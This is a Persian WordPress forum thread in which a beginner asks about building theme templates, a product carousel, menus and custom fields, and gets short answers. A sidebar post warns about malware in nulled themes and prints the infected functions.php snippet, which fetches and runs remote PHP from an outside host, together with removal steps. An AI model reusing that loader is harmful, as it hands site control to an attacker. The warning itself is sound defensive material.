• اطلاعیه ها

• Morteza

باهم بسازیم: اطلس ووکامرس و وردپرس   14/07/96

تاپیک ایجاد شده برای بحث در جهت ایجاد یک منبع، ویکی، صفحات توضیحی و یا بخش آموزشی جامع برای وردپرس و متعلقات مختلف آن است. لطفا جهت مشارکت در این بحث، ارائه پیشنهاد و یا انتقاد به تاپیک فوق مراجعه کنید. باهم بسازیم: اطلس ووکامرس و وردپرس
Sinanium

[پروتوتایپ سایت من] درخواست راهنمایی یک "خیلی" تازه کار وردپرس!

5 پست در این موضوع قرار دارد

ارسال شده در (ویرایش شده)

سلام به همه، وقت بخیر

چند روز پیش در یک تاپیک در زمینه طراحی قالب وردپرس سوالی رو پرسیدم و دوستان زحمت کشیدند و من رو راهنمایی کردند. از اون روز بکوب داشتم چندین کتاب در زمینه برنامه نویسی وب و پیاده سازیشون رو کار می کردم. یک کتاب HTML4 و یک کتاب CSS2 رو کاملا تموم کردم، یک کتاب CSS3 و HTML5 رو هم بزودی تموم می کنم، مقدماتی در حد تسلط و فهم کلی در زمینه Javascript و php هم خوندم. الان بصورت کامل توانایی طراحی قالب گرافیکی در فتوشاپ و تبدیل اون به HTML و CSS رو دارم، البته باید روی jQuery هم تسلط پیدا کنم. چند تا آموزش هم در زمینه ساختار قالب های وردپرس خوندم و با توابع صفحاتی مثل index و Header و Footer و Function و... آشنایی پیدا کردم.

الان مثل کسی می مونم که چیزهایی رو بلدم اما نمی تونم به عمل تبدیلش کنم، یعنی هیچ پیش زمینه ای تو ذهنم ندارم، یک الگو ... . یعنی بلدم پوسته رو در حد استاتیک طراحی کنم اما مثلا نمی دونم چطور میشه قالب ارسال پست رو تغییر داد و صفحات جداگانه ساخت و... ، البته از یک طرفی هم شاید این قضیه نرمال باشه! چون من حدود دو هفته هست که حتی اسم وردپرس رو شنیدم و کتاب هایی در زمینه مدیریت پیشخوان رو خوندم1 تاحالا هیچ سایتی رو هم طراحی نکردم. من برای اینکه این مورد ملموس تر بشه همین الان یک پروتوتایپ سریع از وب سایتی که مد نظرم هست رو کشیدم تا منظورم رو بهتر برسونم، البته رنگبندی و اینا... همه بصورت مصنوعی هست، فقط خواستم منظورم رو برسونم. خواهش می کنم پاسختون رو با توجه به سطح من (مبتدی) ارائه کنید.

فرض بگیریم این صفحه اول سایت من هست:

A1.jpg

این یک سایت شرکت فروش مواد خوراکی هست، در Navigation چند تا بخش اصلی داریم که اگه زیر مجموعه داشته باشند بصورت کشویی باز خواهد شد (مثل محصولات)...

سوال اول: تک صفحه هایی مثل صفحه خدمات، درباره ما و تماس با ما که احتمالا باید توسط ایجاد برگه جدید ایجاد بشن و Header و Footer اونها ثابت هست و فقط وسطون تغییر می کنه باید چطوری تعریف بشن؟ یعنی براشون یک صفحه ای تو HTML بنویسم که بخش وسط صفحه خالی باشه؟ بعد چطور و کجا این کد رو معرفی کنم؟

سوال دوم: تو طراحی اسلایدر نمایش تصاویر بزرگ مشکلی ندارم اما بخش سوم که در پایین هست و آخرین محصولات ثبت شده رو نشون میده رو میخوام طوری باشه که 10 محصول آخر توش قرار می گیرند و بصورت پیش فرض سه تای اونها نمایش داده میشه و بقیه رو توسط اون دکمه فلشی که اونجا قرار داره بتونم ببینم، اول اینکه چطور این اسلایدر رو بسازم و دوم اینکه چطور کاری کنم که بصورت خودکار آخرین محصولات ثبت شده در همه زیررده های محصول به همراه عکسشون + عنوان در این کادر قرار بگیرند و با کلیم روشون به پست محصول مورد نظر وارد شویم.

سوال سوم: فرق فهرست و دسته و برگه ها دقیقا چیه؟ یعنی می دونم چیه اما این گزینه های صفحه من در Navigation باید با دسته تنظیم بشه دیگه نه؟ پس فهرست به چه کارم میاد؟

اما مشکل اصلی من بخش محصولات هست، فرض می کنیم که از Navigation و از گزینه محصولات گزینه لبنایت رو انتخاب می کنیم:

B1.jpg

سوال چهارم: با انتخاب این بخش باید به صفحه اختصاصی لبنیات وارد بشیم و در نظر دارم کلیه ارسال های پست تو وردپرس با این فرمت باشه یعنی از باکس اصلی ویرایشگر وردپرس فقط برای ارسال توضیحات استفاده کنم و چند تا Textbox تو کنترل پنل باشه ("همون چیزی که دوستان بهش می گفتند زمینه دلخواه و من تاحالا نتوسنتم یاد بگیرمش") که بتونم قیمت، وزن و... رو وارد کنم و همچنین فیلدی برای Browse تصویر کوچک و البته تصاویر بیشتر که اگه مشتری خواست بتونه یک گالری از تصاویر رو ببینه!

من درخواست ندارم که کسی اینها رو به من یاد بده (بهم ماهی بده) ، من تقاضا دارم که شما راه یادگیری این موارد رو به من نشون بدید (ماهی گیری!) یعنی من یک مسیر میخوام، اینکه چطوری اینها رو خودم کنار هم بچینم! شاید یک الگو و سایتی که قبلا به همین سبک طراحی شده هم بتونه من رو کمک کنه تا بفهمم باید چیکار کنم اما تاحالا پیدا نکردم چنین چیزی رو، تو کدهای PHP سردرگم میشم چون دقیقا کاربردشون رو نمیدونم، البته خود PHP رو می فهمم. تقاضای راهنمایی دارم! مرسی واقعا!

ویرایش شده در توسط Sinanium
0

به اشتراک گذاری این پست

لینک به پست

1- فایل page.php ایجاد کنید

2- http://forum.wp-parsi.com/tutorials/article/298-%D8%B3%D8%A7%D8%AE%D8%AA-%D8%A7%D8%B3%D9%84%D8%A7%DB%8C%D8%AF%D8%B1-%DB%8C%D8%A7-jcarousel/

3- فهرست جامع تر هست چون میتواند شامل دسته و برگه ها باشد

2

به اشتراک گذاری این پست

لینک به پست

اکثر سوالات رو که جناب پارسا جواب دادن فقط مونده سوال چهارم شما : برای جزئیات محصول می تونید از زمینه دلخواه استفاده کنید و برای گالری هم خود وردپرس براتون گالری میسازه یا می تونید از افزونه های گالری که وجود دارند استفاده کنید.

برای یادگیری و فهم ساختار کلی و جزئی قالب هم به شما پیشنهاد می کنم تا قالب هایی که وجود دارند را دنلود کنید و کد هاش رو چک کنید البته قالب هایی هم هستند که به قالب خام معروفند و می تونه برای یادگیری و سرعت در اجرای طرح هاتون برای شما مفید باشه

3

به اشتراک گذاری این پست

لینک به پست

اگه امکانش هست چند نمونه پوسته در این زمینه معرفی می کنید تا کدهای اونها رو بررسی کنم؟ متشکرم

0

به اشتراک گذاری این پست

لینک به پست

بدنبال پوسته هایی با کلیدواژه clean basic wordpress theme باشید

1

به اشتراک گذاری این پست

لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

• مطالب مشابه

• توسط logomaster
      سلام دوستان . من دوتا لینک انتهای این تیکت میزارم که مربوط به یک قالب هست ( دو صفحه از یک قالب)
      ساختار کلی این قالب بسیار خوبه از دید من و میخواستم از تم فارست خریداری کنم ! اما به دلیل اینکه فروش خوبی نداشته ، پشتیبانی خوبی نداره و تا بحال فقط یکبار آپدیت شده ، نمیخوام ریسک کنم.
      حالا از دوستان اگر کسی یک قالب مشابه این ( از نظر ساختار و قالب بندی محتوا ، کدهای کوتاه و.... ) میشناسه به من معرفی کنه . این قالب خیلی خیلی به ایده آلی که من از یک قالب در ذهن دارم نزدیکه.
      http://demo.cmssuperheroes.com/themeforest/inbound-marketing/form/
      http://demo.cmssuperheroes.com/themeforest/inbound-marketing/services-2-2/
    • توسط mrasoul
      با عرض سلام و خسته نباشید ... لطفا این صفحه را ببینید :
      صفحه مورد نظر
      در این صفحه و بعد از ویدئو یک فهرست وجود دارد با آیتمهایی مثلا
      1.Introduction
      2.Brackets Extensions
      و ... که در اصل سرفصل های این آموزش است که شامل یکسری زیر مجموعه هستند ... وقتی روی زیرمجموعه ها کلیک می کنید اون مجموعه را نشان می دهید . به عنوان مثال روی
      1.2The Extension Manager
      کلیک کنید ...
      من اگر بخوام یک پست آموزشی کامل بسازم و تو این پست این سرفصل ها رو تعریف کنم آیا وردپرس امکانی رو داره بدون اینکه برای هر فصل یک پست ساخت همه ی پستها را داخل یک پست نوشت ؟ یعنی یک پست چند صفحه ایی مثلا مقدمه در خود پست و در مقدمه سرفصل ها رو تعریف کنیم حالا همون پست چند صفحه را زیرمجموعه داشته باشد که این صفحه ها همون سرفصل ها باشند .
      چون اگر قرار باشد برای هر فصل یک پست بفرستم طبیعتا کار بسیار مشکل و زمان بری است چرا که در هرکدام از این پستها باید با زمینه دلخواه سرفصل ها را تعریف کنم و هربار که پست جدید بفرستم در داخل بقیه سرفصل های قبل باید بروم و در زمینه دلخوه لینک این سرفصل جدید را تعریف کنم

• توسط lloyd
      سلام دوستان خوبم اگر کسی میتواند پوسته The Voux را در هاست من نصب کند لطفا به من اینجا اطلاع بدهد. خطای نصب: شیوه نامه گم شده است !

• توسط master89
      دوستان سلام
      یک ویروس جدید اومده برای وردپرس که تبلیغات دزدید میکنه. به این صورت که پاپ آپ کلیکی باز میکنه و توی موبایل بدون کلیک پاپ آپ میذاره.
      جالبش اینجاس که روی آی پی Admin وردپرس پاپ آپ نداره و حتی کد هم نمیتونید پیدا کنید!
      شما میتونید از "پنجره ناشناس" فایرفاکس سایت خودتون رو باز کنید و کد و پاپ آپ رو ببینید. اما باز هم اگه با FTP برید داخل همون صفحه و بخواید کد رو پاک کنید. کد مخفی میشه. به این صورت که با هر بار بارگذاری صفحه کد از جایی بازخوانی میشه.
      توی انجمن های فارسی که بحثی ازش نشده فکر کنم، توی انجمن های خارجی هم بحث شده اما جوابی دریافت نشده.
      صفحه اصلی تبلیغ دزد: go.pub2srv.com هست. که هر بار لینک های تبلیغاتی متفاوتی همراه خودش میتونه داشته باشه. راه های زیادی برای از بین بردنش هست. اما باز بر میگرده و به مرور بیشتر میشه.
      نکته آخر : این ویروس با قالب های نال شده و غیر قانونی وارد وبسایت شما میشه. معمولا هم ارائه دهنده این قالب ها سایت vestatheme هست که اکثر وبسایت هایی که قالب های تجاری رو رایگان برای دانلود میذارن، از این وبسایت دریافت میکنند (پس اکثر سایت ها خطرناک شدن)
      آموزش حذف ویروس :
      اول سایتتون رو اینجا وارد کنید و چک کنید
      https://sitecheck.sucuri.net/  
      حالا برید داخل فلدر قالبتون / فایل function.php رو پیدا کنید و ویرایش کنید
      و قطعه کد زیر رو ازش حذف کنید
      if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path)) { function wp_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } extract(wp_temp_setup($tmpcontent)); } } ?> حالا افزونه  Exploit Scanner رو نصب کنید و اسکن کنید. پس از پایان اسکن ctrl+f رو بزنید و go.pub رو جستجو کنید. اگر نبود، یعنی همه چیز درسته.
      (این افزونه کد های مخفی رو پیدا میکنه و نمایش میده)
      سپاس
    • توسط shayan201680
      با سلام
      بنده یک سایت اصلی وردپرسی دارم و قرار شده که در ساب دامینشم از وردپرس استفاده کنم.
      الان میخوام کاری کنم که کاربران اگر در سایت اصلی ثبت نام کردند بتونند با همون مشخصات در ساب دامین نیز لاگین کنند و برعکس!
      ولی نمیدونم باید چکار کنم! 
      ممنون میشم اگر کسی بلده راهنمایی کنه، با تشکر...